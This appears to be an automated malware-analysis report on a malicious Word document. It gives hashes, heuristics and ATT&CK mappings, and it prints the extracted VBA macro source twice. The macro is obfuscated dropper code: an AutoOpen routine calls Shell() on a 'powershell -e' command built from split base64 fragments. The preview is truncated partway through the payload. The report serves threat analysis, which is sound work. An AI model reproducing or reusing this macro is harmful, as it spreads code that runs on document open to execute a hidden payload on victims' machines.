Office (OLE) malware analysis — malicious · ebf030cd38a70fa4

MALICIOUS

Office (OLE)

102.0 KB Created: 2018-06-12 08:11:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 71e5a857e5f1688919c93997afa9dbcb SHA-1: 82a9233b555f48a6933f00fded2abf80b15ad8bf SHA-256: ebf030cd38a70fa41a826b7088087b52efdd4407c4be970dc45ab8faef76abfa

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains legacy WordBasic auto-execution markers and a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within the VBA macros. The Autoopen subroutine is present and calls RLOSTYCk, which in turn executes a command constructed from obfuscated strings. This strongly suggests the document is designed to download and execute a secondary payload.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11683 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11683 bytes
SHA-256: `cf5791460f470b4d9237f9444c4a54e67841f639d2059310f243a6d494138630`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "kNIYNGPZtq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function RLOSTYCk() On Error Resume Next IBMHS = Tan(60832) sXriO = MdFHv oATBw = CDbl(fPrmt) KWRrcF = sKLAzR wssrT = Hex(ZKADpA * ChrW(DmQiG + Int(PYszUA * Rnd(99217)) * DPczT * Log(69338 * HnXATD - AVOCc + Fix(51)))) uFuduV = Tan(3899) EuYqTh = Tan(42439) XEVQWw = thnbMX jRYIO = CDbl(UzEwiK) szJzV = FwJhLU GAvHup = Hex(iLGRL * ChrW(YaYzX + Int(MtFuXn * Rnd(9649)) * SXZkNn * Log(30673 * UDzDsA - hssnD + Fix(51)))) iaKKd = Tan(16413) RLOSTYCk = ilcsXDnju + Shell(rvUAG + Chr(XKWGUm + vbKeyP + ENSGhHNc) + "owers" + JadGjFdJdij + EizGo + XRCNmBJF + NrYUMCBiddw + ziHVi, 78079 - 78079) BGXTp = Tan(17162) KmWEYC = GUCTpM YBfAB = CDbl(nzOZj) LpNfiN = IJuWoP aYFIq = Hex(wicFsT * ChrW(kDNXwU + Int(rssoYG * Rnd(11212)) * Pdfrk * Log(2195 * OrGjwi - NHnKZz + Fix(51)))) wXZTW = Tan(17912) End Function Sub Autoopen() On Error Resume Next fRkkhs = Tan(28822) ZAimmo = RNYKK lBNjGw = CDbl(GGXOr) jaWwO = ROhmbm QbGLv = Hex(wDuQW * ChrW(buvsT + Int(UvWFuu * Rnd(28329)) * VsQDO * Log(71957 * thrAuc - tMoKz + Fix(51)))) nuVWOJ = Tan(14336) RLOSTYCk pLjLzl = Tan(80828) nrBlK = NErZAR KRkvU = CDbl(aXtoE) BDWKpw = MnYwIN GhRioI = Hex(pfuwPd * ChrW(PitCw + Int(IdrtC * Rnd(55125)) * EOlUb * Log(64746 * PtFPAv - MYbOZT + Fix(51)))) zEfuLG = Tan(52430) End Sub Attribute VB_Name = "pXcLwlbtZUh" Function JadGjFdJdij() On Error Resume Next AKHRj = Tan(43218) cwdRZw = dwwVz jiRqd = CDbl(AVXwY) vqYzlJ = EAbjow wGrmnH = Hex(FVVtQn * ChrW(WUEBF + Int(dIziK * Rnd(78937)) * uPEvdr * Log(76324 * udlJQ - pUCFV + Fix(51)))) PhjWi = Tan(66949) jYfkO = "HeLL -e IAAoA" + "G4AZQBXAC0ATwBi" + "AGoAZQBDAH" + "QAIABJAE" + "8ALg" + "BjAG8ATQBQAHIA" + "ZQBzAFMASQBv" MoINbw = Tan(49251) qRaQYA = cqTso oouYp = CDbl(SMjiN) NbalPJ = qHzCc wVGFpD = Hex(tNXAOp * ChrW(iGkHiN + Int(KYiqa * Rnd(18334)) * wJolRi * Log(84980 * MGtfXA - DaXaW + Fix(51)))) kWsUPT = Tan(73218) iHWZmjnfXFk = "AG4ALgBEA" + "GUARgBsAGEAVA" + "BFAFMAVABSA" + "EUAQQBNACgAWwBz" + "AFkAcwB0AEUAbQ" XPOtIv = Tan(8718) PwGuju = NDpVKU TAmAO = CDbl(wQCPGB) rflPEv = KbUcA tiQazb = Hex(PwOGHh * ChrW(mwuqo + Int(FliSaQ * Rnd(28666)) * zsfKAY * Log(85808 * AcSiZ - vRiHX + Fix(51)))) iMhinV = Tan(69945) jdKzAJvVhi = "AuAEkATw" + "AuAG0AZQ" + "BNAG8AUgBZAFMA" + "VAByAGUAYQBNAF0" + "AWwBDAG8AbgBW" wwzjM = Tan(53879) EiwGI = VwRYK fqQoS = CDbl(lRlLBX) okUCcl = zHrii ODMOP = Hex(dQERj * ChrW(hnaKj + Int(hYbUoA * Rnd(92600)) * msHYwi * Log(11470 * fiFXw - uOjTor + Fix(51)))) wrnbwB = Tan(17780) hjpJmYh = "AGUAUgB" + "UAF0AOgA6AGYAUg" + "BPAE0AQgBhAF" + "MARQA2ADQ" + "AUwBUAHIAaQBOAG" + "cAKAAnAFYAWgBCA" + "GIAYQ" + "A4AEoAQ" tOLRZT = Tan(71844) jSzEQ = sEJzm MlVMEu = CDbl(BTwAhw) lTtFWb = FDAqn qwiSBO = Hex(NIszNi * ChrW(kpjSQH + Int(WZLEa * Rnd(20820)) * GiVVQ * Log(30160 * CliwSS - datrrv + Fix(51)))) QThaj = Tan(10793) jqdqwI = "QBFAEkAWAA" + "vAH" + "kAagA0AE" + "UAawBsAEQAZ" + "ABLAEMA" + "bwB0AGgAbwBLAHQ" + "AbAA1" + "AGQAVwBx" + "AG" + "EAUQBY" YXNaE = Tan(15763) aXizP = hEETzp twRMiP = CDbl(qOnukK) iNQXOK = DDPuc qLOOd = Hex(JaZFAs * ChrW(KQLjjN + Int(EDqnv * Rnd(67726)) * apvCSF * Log(3490 * izZRt - CEIPf + Fix(51)))) zFrUj = Tan(63511) pupCaOMbzIZ = "AEsAZwBYAFoA" + "YgBNAF" + "oAawBkAG" + "QAMQBkAE4AbABQ" + "AGoAQgBmA" + "DkANwB0ADI" + "AcQBGAHY" + "AZwB6AE" + "0Abg" InVaS = Tan(88107) ikiDi = nDlMJR EBwhY = CDbl(JfVwb) litTJ = HXjRR Fhsmw = Hex(iKONT * ChrW(onCCk + Int(NmDhwE * Rnd(88216)) * boCtnm * Log(69121 * cqXXi - TQGYO + Fix(51)))) iWVFnA = Tan(8086) OFwivwoiq = "BPADgA" + "dwBaADgAWQByADk" + "Abg" + "BMAEU" + "AeQBEAD" + "EAUgB" + "VAE4AVgAxAHU" + "AZwBTAE8AeAB" + "EAEsAVgA2A" WXlosM = Tan(84819) IVahWP = MfNwM mbXpH = CDbl(FSzFn) EDFFii = JdIlw PPMIaa = Hex(rNjwN * ChrW(lHmXLP + Int(zSMEHw * Rnd(66976)) * DpipZI * Log(84117 * ... (truncated)

SHA-256: cf5791460f470b4d9237f9444c4a54e67841f639d2059310f243a6d494138630

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "kNIYNGPZtq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function RLOSTYCk()
On Error Resume Next
IBMHS = Tan(60832)
sXriO = MdFHv
oATBw = CDbl(fPrmt)
KWRrcF = sKLAzR
wssrT = Hex(ZKADpA * ChrW(DmQiG + Int(PYszUA * Rnd(99217)) * DPczT * Log(69338 * HnXATD - AVOCc + Fix(51))))
uFuduV = Tan(3899)
EuYqTh = Tan(42439)
XEVQWw = thnbMX
jRYIO = CDbl(UzEwiK)
szJzV = FwJhLU
GAvHup = Hex(iLGRL * ChrW(YaYzX + Int(MtFuXn * Rnd(9649)) * SXZkNn * Log(30673 * UDzDsA - hssnD + Fix(51))))
iaKKd = Tan(16413)
RLOSTYCk = ilcsXDnju + Shell(rvUAG + Chr(XKWGUm + vbKeyP + ENSGhHNc) + "owers" + JadGjFdJdij + EizGo + XRCNmBJF + NrYUMCBiddw + ziHVi, 78079 - 78079)
BGXTp = Tan(17162)
KmWEYC = GUCTpM
YBfAB = CDbl(nzOZj)
LpNfiN = IJuWoP
aYFIq = Hex(wicFsT * ChrW(kDNXwU + Int(rssoYG * Rnd(11212)) * Pdfrk * Log(2195 * OrGjwi - NHnKZz + Fix(51))))
wXZTW = Tan(17912)
End Function
Sub Autoopen()
On Error Resume Next
fRkkhs = Tan(28822)
ZAimmo = RNYKK
lBNjGw = CDbl(GGXOr)
jaWwO = ROhmbm
QbGLv = Hex(wDuQW * ChrW(buvsT + Int(UvWFuu * Rnd(28329)) * VsQDO * Log(71957 * thrAuc - tMoKz + Fix(51))))
nuVWOJ = Tan(14336)
RLOSTYCk
pLjLzl = Tan(80828)
nrBlK = NErZAR
KRkvU = CDbl(aXtoE)
BDWKpw = MnYwIN
GhRioI = Hex(pfuwPd * ChrW(PitCw + Int(IdrtC * Rnd(55125)) * EOlUb * Log(64746 * PtFPAv - MYbOZT + Fix(51))))
zEfuLG = Tan(52430)
End Sub


Attribute VB_Name = "pXcLwlbtZUh"
Function JadGjFdJdij()
On Error Resume Next
AKHRj = Tan(43218)
cwdRZw = dwwVz
jiRqd = CDbl(AVXwY)
vqYzlJ = EAbjow
wGrmnH = Hex(FVVtQn * ChrW(WUEBF + Int(dIziK * Rnd(78937)) * uPEvdr * Log(76324 * udlJQ - pUCFV + Fix(51))))
PhjWi = Tan(66949)
jYfkO = "HeLL -e IAAoA" + "G4AZQBXAC0ATwBi" + "AGoAZQBDAH" + "QAIABJAE" + "8ALg" + "BjAG8ATQBQAHIA" + "ZQBzAFMASQBv"
MoINbw = Tan(49251)
qRaQYA = cqTso
oouYp = CDbl(SMjiN)
NbalPJ = qHzCc
wVGFpD = Hex(tNXAOp * ChrW(iGkHiN + Int(KYiqa * Rnd(18334)) * wJolRi * Log(84980 * MGtfXA - DaXaW + Fix(51))))
kWsUPT = Tan(73218)
iHWZmjnfXFk = "AG4ALgBEA" + "GUARgBsAGEAVA" + "BFAFMAVABSA" + "EUAQQBNACgAWwBz" + "AFkAcwB0AEUAbQ"
XPOtIv = Tan(8718)
PwGuju = NDpVKU
TAmAO = CDbl(wQCPGB)
rflPEv = KbUcA
tiQazb = Hex(PwOGHh * ChrW(mwuqo + Int(FliSaQ * Rnd(28666)) * zsfKAY * Log(85808 * AcSiZ - vRiHX + Fix(51))))
iMhinV = Tan(69945)
jdKzAJvVhi = "AuAEkATw" + "AuAG0AZQ" + "BNAG8AUgBZAFMA" + "VAByAGUAYQBNAF0" + "AWwBDAG8AbgBW"
wwzjM = Tan(53879)
EiwGI = VwRYK
fqQoS = CDbl(lRlLBX)
okUCcl = zHrii
ODMOP = Hex(dQERj * ChrW(hnaKj + Int(hYbUoA * Rnd(92600)) * msHYwi * Log(11470 * fiFXw - uOjTor + Fix(51))))
wrnbwB = Tan(17780)
hjpJmYh = "AGUAUgB" + "UAF0AOgA6AGYAUg" + "BPAE0AQgBhAF" + "MARQA2ADQ" + "AUwBUAHIAaQBOAG" + "cAKAAnAFYAWgBCA" + "GIAYQ" + "A4AEoAQ"
tOLRZT = Tan(71844)
jSzEQ = sEJzm
MlVMEu = CDbl(BTwAhw)
lTtFWb = FDAqn
qwiSBO = Hex(NIszNi * ChrW(kpjSQH + Int(WZLEa * Rnd(20820)) * GiVVQ * Log(30160 * CliwSS - datrrv + Fix(51))))
QThaj = Tan(10793)
jqdqwI = "QBFAEkAWAA" + "vAH" + "kAagA0AE" + "UAawBsAEQAZ" + "ABLAEMA" + "bwB0AGgAbwBLAHQ" + "AbAA1" + "AGQAVwBx" + "AG" + "EAUQBY"
YXNaE = Tan(15763)
aXizP = hEETzp
twRMiP = CDbl(qOnukK)
iNQXOK = DDPuc
qLOOd = Hex(JaZFAs * ChrW(KQLjjN + Int(EDqnv * Rnd(67726)) * apvCSF * Log(3490 * izZRt - CEIPf + Fix(51))))
zFrUj = Tan(63511)
pupCaOMbzIZ = "AEsAZwBYAFoA" + "YgBNAF" + "oAawBkAG" + "QAMQBkAE4AbABQ" + "AGoAQgBmA" + "DkANwB0ADI" + "AcQBGAHY" + "AZwB6AE" + "0Abg"
InVaS = Tan(88107)
ikiDi = nDlMJR
EBwhY = CDbl(JfVwb)
litTJ = HXjRR
Fhsmw = Hex(iKONT * ChrW(onCCk + Int(NmDhwE * Rnd(88216)) * boCtnm * Log(69121 * cqXXi - TQGYO + Fix(51))))
iWVFnA = Tan(8086)
OFwivwoiq = "BPADgA" + "dwBaADgAWQByADk" + "Abg" + "BMAEU" + "AeQBEAD" + "EAUgB" + "VAE4AVgAxAHU" + "AZwBTAE8AeAB" + "EAEsAVgA2A"
WXlosM = Tan(84819)
IVahWP = MfNwM
mbXpH = CDbl(FSzFn)
EDFFii = JdIlw
PPMIaa = Hex(rNjwN * ChrW(lHmXLP + Int(zSMEHw * Rnd(66976)) * DpipZI * Log(84117 *
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.